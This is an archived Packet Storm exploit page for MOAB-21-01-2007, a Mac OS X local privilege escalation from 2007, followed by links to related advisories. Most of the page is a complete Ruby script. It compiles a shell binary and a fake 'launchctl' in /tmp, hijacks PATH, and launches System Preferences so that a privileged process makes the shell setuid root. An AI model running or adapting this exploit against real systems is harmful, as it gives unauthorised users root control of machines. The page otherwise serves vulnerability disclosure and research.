Lucene search
Kevin FinisterrePACKETSTORM:53873HistoryJan 24, 2007 - 12:00 a.m.
MOAB-21-01-2007.rb.txt
2007-01-2400:00:00
Kevin Finisterre
packetstormsecurity.com
17
0.0004 Low
EPSS
Percentile
11.5%
`#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com>
# Lance M. Havok <lmh [at] info-pull.com>
# All pwnage reserved.
#
# "Exploit" for MOAB-21-01-2007: OS X, making root shells easier each day.
#
SHELL_WRAP = 'int main() { system("/bin/sh -i"); return 0; }'
SHELL_PLANT = 'int main() { system("chown root: /tmp/shX; chmod 4755 /tmp/shX"); return 0; }'
PREFS_BINPATH = '/Applications/System\ Preferences.app/Contents/MacOS/System\ Preferences'
COMMAND_LINE = "echo '#{SHELL_WRAP}' > /tmp/t.c &&" +
"cc -o /tmp/shX /tmp/t.c &&" +
"echo '#{SHELL_PLANT}' > /tmp/t.c &&" +
"cc -o /tmp/launchctl /tmp/t.c &&" +
'export PATH="/tmp/:$PATH" &&' +
"#{PREFS_BINPATH} &"
def escalate()
system COMMAND_LINE
puts "++ Click on Sharing and then click on Windows Sharing..."
sleep 30 # make sure you have "time"
system "/tmp/shX"
end
escalate()
`
Related
securityvulns
securityvulns
Mac OS X writeconfig privilege escalation
2007-01-22 00:00:00
prion
prion
Design/Logic Flaw
2007-01-23 00:28:00
cve
cve
CVE-2007-0022
2007-01-23 00:28:00
nessus
nessus
Mac OS X Multiple Vulnerabilities (Security Update 2007-004)
2007-04-21 00:00:00